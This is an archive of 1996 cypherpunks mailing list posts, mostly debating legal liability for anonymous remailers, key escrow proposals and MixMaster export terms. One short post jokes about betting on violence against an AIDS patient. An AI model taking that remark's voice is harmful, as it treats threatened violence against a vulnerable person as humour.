>operate with more assurance of honesty.
>
>Eric






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 21 May 1996 20:30:24 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [Linux] Unix plugins for Netscape (Was: Calling other code  in Java applications and applets)
In-Reply-To: <2.2.32.19960502195251.00c80164@mail.teleport.com>
Message-ID: <31A16949.759@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> Are they keeping a list?  As for Linux, last I heard it was still on the
> semi-supported list.  (The dropping of BSD on the fasttrack server pisses me
> off as well, but that is another matter...)  I would like to get a version
> of the Linux binary that supports 128 bit SSL. (As well as the ELF binaries.)

  Caldera is selling and supporting navigator for linux as part of their
network desktop product.  If you want a 128-bit version, you would probably
be best off lobbying them for it.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 21 May 1996 18:32:33 +0800
To: cypherpunks@toad.com
Subject: Assassination politics
Message-ID: <ZsF0ND72w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


So, how would I go about betting that a certain AIDS patient in Seattle
area won't have his legs broken? :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 21 May 1996 17:42:30 +0800
To: rodger@interramp.com (Will Rodger)
Subject: Re: Interactive Week exclusive - White House to launch "Clipper III"
In-Reply-To: <v01510100adc39ec77b27@[38.12.5.138]>
Message-ID: <0lcI5du00YUzIZ8_JC@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 18-May-96 Interactive Week exclusive
.. by Will Rodger@interramp.co 
> The White House is about to answer recent attempts to liberalize encryption
> exports with a proposal of its own.
[...]
> The newest proposal is contained in a 24-page White Paper, a draft of which
> hit Capitol Hill earlier this week.

Kudos to Will for running this story. Today I snagged a copy of the
White Paper, which comes with 12 pages of tortured crypto-justifications
and 12 pages of appendices, with darling hierarchial diagrams of how
U.S. and foreign certification authorities will interact. (Hint: The
PAA, or Policy Approving Authority, is at the root of each country's or
region's certification hierarchy.)

It's very anti-anonymity: "Without a KMI of trusted certifying
authorities, users cannot know with whom they are dealing on the
network..."

And not very cypherpunkly: "A number of principles need to be accepted
by government, industry and other users... Self escrow will be permitted
under specific circumstances. The escrow agent must meet performance
requirements for law enforcement access."

Basically, what the White Paper does is pay lip service to free market
competition and suggests loads of government/industry initiatives, but
it's always with the gummit wearing the steel gauntlet beneath the felt
gloves. It concludes by promising industry a transition into unlimited
key-lengthy export, provided they follow the rules:

"As trusted partners, industry and government can share expertise and
tackle intractable problems such as the insecure operating system. In
times past, the cryptographic algorithm was the core of the solution:
now it is the easy part. The debate over algorithms and bit lengths
should end: it is time for industry and govenrments to work together to
secure the GII in such a way that does not put the world at risk."

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 19:15:41 +0800
To: cypherpunks@toad.com
Subject: Re:  An alternative to remailer shutdowns (fwd)
Message-ID: <adc6b9791b021004cac0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:33 AM 5/21/96, Hal wrote:
>From: Jim Choate <ravage@ssz.com>

>> There should be a section in there dealing with 'knowingly'. If not then we
>> should immediately bring charges against any and all newspapers who have
>> ever printer a ransom letter, or perhaps even the Unibomber Manifesto since
>> there is clear evidence of 'threat to injure the person of another'.
>
>I think Jim is right about the knowledge requirement, which although not
>stated explicitly in the statute, has been held by the courts to be an
>essential element.  My point in quoting is more to show an example of the
>kinds of clearly illegal postings which operators have to deal with.

"Scienter" is the legal term for having knowledge.

This is one reason we often talk about the dangers of remailers looking at
what flows through their systems. Not so much to establish "common carrier"
status, especially as that kind of status is just not something one sets
out to establish!, but because the protection of being ignorant gets tossed
out as soon as one admits to screening, or editing.

This is not perfectly accurate in all situations. A bookstore owner is
generally not held liable for the contents of the books in his store, even
though he makes certain choices about what to carry and what not to carry.
A magazine editor is more often held liable for content of articles (e.g.,
infringing materials, libel, etc.). We discussed this many times when I was
on the Cyberia list. As best I could figure things out, the bookstore owner
is excused from liability because we can't expect he'll have actually read
the books in his store, even if chooses which ones to carry, but we expect
that the editor of "The New Republic" has personally looked at all of the
articles, or had a staff of underlings do so.

BTW, I think that remailer operators don't fit either the publishing or
bookstore models. While it is tempting to compare them to telephones, I
think a better comparison is to *package delivery services* like the U.S.
Postal Service, UPS, Federal Express, Airborne, etc.

As we have discussed *so many* times (:-}), these package delivery services
cooperate in various ways with law enforcement investigations, e.g.,
shipping of drugs by FedEx, but they are not held liable for illegal
materials delivered or for crimes committed with the aid of their services.


(And these delivery services DO NOT always insist on valid return
addresses, in case anyone brings this up. Letters can be dropped in
mailboxes, obviously, and pre-paid mailers are available. When I've used
FedEx, I don't recall any checks of my identity.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 19:44:41 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <adc6bd961c021004c24b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:56 PM 5/20/96, Rev. Mark Grant, ULC wrote:
>With regard to the problems of remailers being shut down when we want
>long-lived addresses, wouldn't seperating the input and output be one
>possibility? That is (like Hal's Alumni remailer) you'd send mail to
>'remailer@anon.ai' and it would be forwarded via a disposable account
>elsewhere. All messages would appear to come from 'disposable@foo.com' and
>if that account was shut down a new one could be opened to replace it
>while incoming mail simply backed up at the main remailer account.

This is a very good idea.

It keeps the advantages of having persistent accounts (which other users,
chaining programs, etc. can use) while making it appear that the mail is
coming from another account.

"Security through obscurity," I hear you snort. Well, not really. The
_legal_ account is the one that an unhappy recipient sees on the "From:"
line. The Church of Scientology sees "disposable@foo.com" and fires off a
letter to foo.com requesting that foo.com cause this account to disappear.
So it does, but "transient@bar.com" picks up the slack.

An idea worth trying, of formally/legally separating the functions.

Of course, in some sense this is a special case of having disposable
accounts for "instant remailers" (see recent thread on this).



>The only potential problem I could see would be that the disposable ISP
>might have logs which could track the outgoing messages back to the other
>account. You'd also obviously need to open the disposable account
>anonymously or using an ISP who'd protect your identity.

Traffic analysis will be quite easy to do, of course, as all mail sent to
the persistent address comes out of the "disposable@foo.com" address.
Q.E.D.

(Hal, to use him as the example, could start using his own choice of
remailer hops to accomplish much the same result. We've talked about this
for a long time, too. If I ran a remailer, I think I'd route *all* traffic
leaving my site through at least one other remailer...kind of a "hot
potato" effect. Of course, if _everyone_ did this, an infinite loop would
result. Lots of interesting twists, though, as messages could be set to
"leak out" of the loops.)

But this scheme, here, and Mark's scheme, are variants on the idea of
trying to make the remailers less clearly-identifiable targets.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 21:46:26 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <adc6c1241d0210049836@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:47 AM 5/21/96, Rich Graves wrote:
>On Tue, 21 May 1996, Declan B. McCullagh wrote:
                      ^^^^^^^^^^^^^^^^^^^
>
>> An alternative I am considering would reduce the utility of the remailer
>> while still allowing these "consensual" uses to continue.  Presently the
>> remailers deal with abuse via "block lists", sets of addresses that mail
>> can't be sent to.  Generally these are created when someone complains
>> about some mail they have received.  By setting up blocking, at least
>> they will not get harrassing anonymous mail once they have complained.
>> But in some cases, as in the case that is causing me headaches now, even
>> one message is too much.
>>
>> My thought is to turn the block list concept on its head, and make it a
>> "permit list".  Simply, the remailer will only send mail to people who
>> have voluntarily indicated their willingness to receive it.

You reply-quote process must have been hit with an alpha particle, because
all of this was written by Hal Finney, not Declan.


--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 19:39:20 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <adc6c1ea1e021004c693@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:25 AM 5/21/96, Lance Cottrell wrote:

>An interesting problem with anonymous postage is that it is likely to kill
>cover traffic generators.
>

I doubt it. It's easy enough for remailers to, for example, pass out free
tokens to other remailer operators.

(Jukebox and other coin-op concessions often pass out tokens (slugs, or
marked coins) to storeowners and bartenders to use to stimulate the
market.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 21 May 1996 22:02:32 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <Pine.3.89.9605210818.A20379-0100000@netcom3>
Message-ID: <Pine.GUL.3.93.960521011638.4377B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, jonathon wrote:

> On Mon, 20 May 1996, Rich Graves wrote:
> > On Tue, 21 May 1996, Declan B. McCullagh did NOT write:

[Oops, I was replying to Declan's forward of Hal Finney's message, and got
the attribution wong. The path cypherpunks -> fight-censorship -> me 
is often faster than cypherpunks -> me, probably because unsubscribing
and resubscribing put me way down on the list. Sorry. This was Hal.]

> > I like the "knock-knock" approach, though it would of necessity impose
> > load. If someone has an anonymous message waiting, send them a simple note
> > with instructions on how to retrieve it.
> 	
> 	That way you could also charge the recipient to retrieve
> 	a message. 
> 
> 	How about a farthing to recieve a message, and 
> 	two farthings to send a message, no charge to 
> 	mixmaster recipients or originators?

That sounds like a great opportunity for denial-of-service attacks. No,
thank you.

A flat fee for a special-delivery service profile (gimme $5/month and you
get messages automatically, without the confirmation) would be fine, but I
can't see paying per piece to *receive* anonymous messages.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: admin@anon.penet.fi
Date: Tue, 21 May 1996 18:52:47 +0800
To: cypherpunks@toad.com
Subject: Anonymous info
Message-ID: <9605210131.AA28441@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested information about your account at anon.penet.fi.

Your code name is: <an611909@anon.penet.fi>
Your real e-mail address is: <cypherpunks@toad.com>
Your nickname is: <>
Your password is: <>

Regards,

	admin@anon.penet.fi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 21 May 1996 21:48:27 +0800
To: timd@consensus.com (Tim Dierks)
Subject: Re: Rumor: DSS Broken?
Message-ID: <199605211006.GAA23157@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 19 May 96 at 21:48, Tim Dierks wrote:
[..]
> PPS - Any chance the original rumor surrounded RCA/Hughes' DSS satellite TV
> system, and not the Digital Signature Standard, and we've all been barking
> up the wrong tree?

Hm. Check the cable/satellite tv newsgroups.


Rob.
 
---
No-frills sig.
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 22 May 1996 00:35:53 +0800
To: cypherpunks@toad.com
Subject: Hiding remailers behind nymservers...? (fwd)
Message-ID: <199605211157.GAA16464@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 20 May 1996 18:53:15 -0700 (PDT)
> From: Steve Reid <root@edmweb.com>
> Subject: Hiding remailers behind nymservers...?
> 
> This 'middle-man' remailer... What does it really accomplish? Sure, the
> operator is hidden, but that's only because of his/her nym at c2.org...
> AFAICS, the 'middle-man' has just taken the liability off himself and put
> it on the unhidden remailers. Why not just use the existing unhidden
> remailers??? 
> 

The first thing it accomplishes in my mind is establishing pre-meditation to
conspire to the commission of a felony.


                                                          Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Tue, 21 May 1996 21:52:30 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <Pine.GUL.3.93.960520223851.489X-100000@Networking.Stanford.EDU>
Message-ID: <Pine.3.89.9605210818.A20379-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Rich Graves wrote:

> On Tue, 21 May 1996, Declan B. McCullagh wrote:
> I like the "knock-knock" approach, though it would of necessity impose
> load. If someone has an anonymous message waiting, send them a simple note
> with instructions on how to retrieve it.
	
	That way you could also charge the recipient to retrieve
	a message. 

	How about a farthing to recieve a message, and 
	two farthings to send a message, no charge to 
	mixmaster recipients or originators?

        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 22 May 1996 01:31:03 +0800
To: qut@netcom.com (Dave Harman)
Subject: Re: CAPITALISTS' SUCK
Message-ID: <199605211245.IAA24492@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 20 May 96 at 4:07, Dave Harman wrote:

[..]
> ! >Dave Harman writes:
> ! >
> ! > CAPITALISTS' SUCK
> ! 
> ! What witty social commentary.
> 
> Information wants to be free.

Information doesn't want to be free (or anything else) anymore than 
the stapler on my desk wants to be free.

The day that abstract qualities like "information" or "color" have 
desires would be an interesting day indeed.

And that has little to do with who or what the capitalist down the 
street is sucking.

--Mutant Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 22 May 1996 03:38:28 +0800
To: cypherpunks@toad.com
Subject: MixMaster fair use
Message-ID: <199605211400.JAA16693@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

Perhaps I am confused about what MixMaster's license allows. I have joined
the confusing part (for me anyway)...

README.no-export :

All the files in this archive contain crpytographic code which is
restricted by the ITAR regulations on munitions.
These files may only be retrieved by US citizens, and only on condition of
agreement not to export any of this software or dats, and to extract
a similar agreement from any person they may transfer it to.

To access the export-controled materials on
this site, you must agree to "THE AGREEMENT"
below. If your email address ends in one of the following:

.edu .com .edu. .gov .mil .org .net .us .ca

Do this by sending "THE AGREEMENT",
exactly as it appears, to

   mix-request@jpunix.com


If it does not, but you qualify to retrieve 
Mixmaster under "THE AGREEMENT", then send mail
to perry@alpha.jpunix.com, explaining your
situation.

In either case you will be sent a message containing
the name of a hidden directory in which you will
find the controlled software. The name of the directory
changes frequently, so you must get the name
each time you want to access the hidden directory.

	-John A. Perry 5/6/95

--------------------------------------------------
	THE AGREEMENT:
I am a citizen or national of the United States,
or of Canada, or have been lawfully admitted for permanent
residence in the United States under the
Immigration and Naturalization Act.

I agree not to export Mixmaster, or RSAREF
or any other software in this archive,
in violation of the export
control laws of the United States of America as implemented
by the United States Department of State Office of
Defense Trade Controls.

Before I download Mixmaster, I will read
and agree to the terms and conditions of the RSAREF
license (in ftp://ftp.jpunix.com/pub/rsalicen.txt).

I will use Mixmaster solely for non-commercial purposes.
----------------------------------------------------------

Directory name last changed at: Wed May 1 09:00:01 CDT 1996


End README.no-export


What confuses me is the part above that states that I agree to use Mixmaster
for solely non-commercial use. This is NOT GNU or copyleft.




                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 22 May 1996 03:42:36 +0800
To: cypherpunks@toad.com
Subject: Remailer extensions
Message-ID: <199605211417.JAA16736@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

In pondering the last few days of discussion it occurs to me that a test
might be possible. In short:

Is it legal for a business to anonymously remail physical mail?

The process I propose is as follows:

1.   Some party mails an envelope to 'Remailers-R-Us'.

2.   Inside that envelope is the real mail addressed and stamped along
     with say a $1 money order for processing.

3.   The people at Remailers-R-Us simply take the dollar and deposit it
     in the bank while depositing the letter they received in the local
     mail drop.

Now the Remailers-R-Us obviously can't open the mail since that would be
tampering. To this end I make reference to some comments I made about a year
ago regarding the results of encrypting every stage of the remailer
sequence. To wit, the only way to guarantee protection is if the remialer
is not able to read the actual contents of the mail, even if they were so
disposed.

I would also like to point out (the obvious I admit) that the founding
fathers apparently embarced anonymous distribution via their 'publius'
handle. It seems to me that a federal prosecutor would have a hard time
claiming there was no precedence for such actions. Such a claim to my way
of thinking would be fundamental in any attempted prosecution for anonymous
remailing. Also, as far as I can find out, there was no persecution of the
newspapers for printing this material anonymously, they apparently were not
held to task for the content. This seems to indicate that English commen law
of that day (and its descendants here today) embraced anonymous speech as
well.


                                                      Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Wed, 22 May 1996 06:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <2.2.32.19960521162219.006baee0@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:02 PM 5/20/96 -0700, Hal <hfinney@shell.portal.com> wrote:

>My thought is to turn the block list concept on its head, and make it a
>"permit list".  Simply, the remailer will only send mail to people who
>have voluntarily indicated their willingness to receive it. 

On the whole, I like it. The problem comes when someone is trying
communicate anonymously with some other person who doesn't have a clue about
the whole thing. It would be neat to have soem way of generating a message
to the effect "Someone is trying to communicate anonymously with you. [short
explanation of good and bad uses of anonymity] If you would like to receive
this message, [instructions about permitting]"

Unfortunately, I don't know how one could separate those messages from all
the rest of the traffic.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 06:53:40 +0800
To: cypherpunks@toad.com
Subject: Re: Hiding remailers behind nymservers...? (fwd)
Message-ID: <adc741aa1f021004ca2d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM 5/21/96, Jim Choate wrote:
>Forwarded message:
>
>> Date: Mon, 20 May 1996 18:53:15 -0700 (PDT)
>> From: Steve Reid <root@edmweb.com>
>> Subject: Hiding remailers behind nymservers...?
>>
>> This 'middle-man' remailer... What does it really accomplish? Sure, the
>> operator is hidden, but that's only because of his/her nym at c2.org...
>> AFAICS, the 'middle-man' has just taken the liability off himself and put
>> it on the unhidden remailers. Why not just use the existing unhidden
>> remailers???
>>
>
>The first thing it accomplishes in my mind is establishing pre-meditation to
>conspire to the commission of a felony.

No, think of scienter again.

And creating something or some service that _may_ be used in connection
with a crime does not make the creator a conspirator, unless it can be
shown that he was involved in the planning of the crime used with his thing
or service.

For example, if I open up a car rental place and one of my cars is used in
a bank robbery, was I involved in a "pre-meditation to conspire to the
commission of a felony."? Clearly not.

(And before anyone brings up "required ID" at car rental agencies, such ID
is not required by any local, state, or national laws, so far as I have
ever heard. It is perfectly legal for me to rent things to people without
demanding credentials. A sufficiently large deposit may be enough. ID is
often used to satisfy insurance requirements, and to help in collecting any
unreturned items.)

Now it may be that operating a remailer may be interpreted by some courts
as being a "public nuisance," a theory I credit to Brad Templeton, but this
has not yet come even close to happening.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 22 May 1996 03:57:44 +0800
To: cypherpunks@toad.com
Subject: re: "Very Famous Reporter"
In-Reply-To: <v02140b00adc585ab32a2@[17.128.203.234]>
Message-ID: <v03006617adc77de8b7e6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:22 AM  -0400 5/21/96, Martin Minow wrote:
> At a lecture about his recent book, John Markoff, the New York Times'
> Silicon Valley reporter, said (and I quote from memory):
>
> "The most dangerous animal on earth is a reporter on deadline."

Oh, the irony of that remark...

In the meantime, it appears that I have egg on my face, as no story has
emerged...

By the way, did I say it was a rumor? ;-).

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 21 May 1996 22:12:10 +0800
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Re: The Crisis with Remailers
In-Reply-To: <4nq6qp$3fl@abraham.cs.berkeley.edu>
Message-ID: <199605210808.KAA11113@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity known as Ian Goldberg is alleged to have written:
>
> Another problem with postage in Mixmaster:  the minimum ecash payment is
> $0.01.  Do we want to charge that much for email?  Need we consider
> micropayments?


The above, as stated, is inaccurate.  The "minimum ecash payment"
is not known at this time, although we think it might be greater
than 2^-32 US Dollars.  <img alt=":-)" meta meaning="That was a 
joke." src="http://www.c2.net/~bryce/smiley.gif">


Regards,

Bryce

#include <stddisclaimer.h> /* Not speaking for anyone else at this time. */
- -----BEGIN GOODTIMES VIRUS INNOCULATION-----
Copy me into your .sig for added protection!
- ----- END  GOODTIMES VIRUS INNOCULATION-----



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaF58kjbHy8sKZitAQGDngMAqACaQA9rMDMq644cSVvtUtxnpV2jIlpC
cCMwZKCFZEiBIy0Y1wN5uiITSQSJASUEh+4xZ5GZfT6ngn4etIgg1Np735G+nZ1j
O4dP0QdRVr2ULARIPdZ2fjUV31iSWiXc
=d9ic
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 21 May 1996 20:27:34 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Senator, your public key please?
In-Reply-To: <9605202045.AA00456@ch1d157nwk>
Message-ID: <199605210815.KAA11605@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity knows as Andrew Loewenstern 
 <andrew_loewenstern@il.us.swissbank.com> probably wrote:
> 
> You can be sure that there will be rallying cries for laws to be passed to  
> ensure the accuracy of statements made in key certificates, that characters  
> are not defamed, that libel is not committed, etc...  Lots of the same issues
> involving any other type of speech and the international and sometimes  
> untraceable nature of the Net.  What do you do about a signature on your key,
> posted anonymously to the net, which names you as one of the Four  
> Horsemen(*tm)?


Hey, does that little symbol stand for "Timothy May-mark"?


I didn't know he had started laying claim to memes that he 
helped propagate...


But back to the actual subject, I can't imagine that an
_anonymous signature_ will have any credence at all.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaF7g0jbHy8sKZitAQFZUwL/dq4oX/MXqvJFp/VGv5hIOpbawnz8oSnA
Vv5lIKperoZXg39ukzRjLRqzuursIlzeI23/aXSLRFKKZtVU/XFTeuZTor282aqB
n49lduz070amEZFLCwXCO3iSksk0Y3wv
=TGjr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 06:54:34 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns (fwd)
Message-ID: <199605211725.KAA01106@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:28 PM 5/20/96 -0500, Jim Choate wrote:
>
>Forwarded message:
>
>> Date: Mon, 20 May 1996 15:02:08 -0700
>> From: Hal <hfinney@shell.portal.com>
>> Subject: An alternative to remailer shutdowns
>
>> was apparently sent through my remailer.  According to 18 USC 875(c),
>> "Whoever transmits in interstate commerce any communication containing
>> any threat to kidnap any person or any threat to injure the person of
>> another, shall be fined not more than $1,000 or imprisoned not more
>> than five years, or both."  I may not be able to continue operating
>> either of my remailers (alumni.caltech.edu and shell.portal.com) for
>> much longer due to this kind of abuse.
>
>There should be a section in there dealing with 'knowingly'. If not then we
>should immediately bring charges against any and all newspapers who have
>ever printer a ransom letter, or perhaps even the Unibomber Manifesto since
>there is clear evidence of 'threat to injure the person of another'.

But even "knowingly" needs to be carefully defined.  A remailer operator 
today KNOWS that his system COULD be used for illegal activities; he merely 
doesn't know that they are, currently.  I think that the definition should 
be so narrow that it is impossible for a third party (or the government 
itself)  to incriminate the remailer operator by having his system forward 
arguably illegal or copyright-violating material.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 07:34:19 +0800
To: cypherpunks@toad.com
Subject: Are there laws against remailing messages?
Message-ID: <adc7448f200210047837@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[I've changed the thread title.]

At 2:17 PM 5/21/96, Jim Choate wrote:

>In pondering the last few days of discussion it occurs to me that a test
>might be possible. In short:
>
>Is it legal for a business to anonymously remail physical mail?
...
>I would also like to point out (the obvious I admit) that the founding
>fathers apparently embarced anonymous distribution via their 'publius'
>handle. It seems to me that a federal prosecutor would have a hard time
>claiming there was no precedence for such actions. Such a claim to my way
>of thinking would be fundamental in any attempted prosecution for anonymous
>remailing. Also, as far as I can find out, there was no persecution of the
>newspapers for printing this material anonymously, they apparently were not
>held to task for the content. This seems to indicate that English commen law
>of that day (and its descendants here today) embraced anonymous speech as
>well.


Several points:

* The Supreme Court formally decided many years ago that leaflets, fliers,
articles, handouts, etc., cannot be required to be identified. (Some state
had tried to require that leaflets be identifed with the name of the author
or distributing group. I don't have the case name handy, but it's pretty
famous and is cited in all the books on cyberspace law...I may even have a
mention of it by name in the Cyphernomicon.)

* This ruling, which is certainly fully consistent with the First
Amendment, should of course apply to electronic forms of leaflets, fliers,
articles, handouts, etc. Unless, of course, there is an upheld
interpretation that the Net is different from print media, which I think it
clearly is not.

* As to laws against receiving a letter and then resending it to somone
else...how could that be a crime? What I receive in my mail is my business.
What I do with what I receive in the mail is also my business. Demanding
that I process letters or notes to me in certain ways and not in other ways
would be interfering with my communications.

(Quibblers will likely cite FCC and election campaign laws as a
counterexample. Wrongly, I think. Another debate.)

* Now if I start doing this remailing on a large-scale basis, various
business regulations, tax laws, etc., obviously come into effect.
"Remailings Etc." will have to satisfy various regulators, tax collectors,
OSHA inspectors, etc...all the things that make it so hard to start a small
business in America. However, I can't think of any obvious laws which ban
receiving a package or letter, removing the outer addressing, removing the
payment, and then resending it.

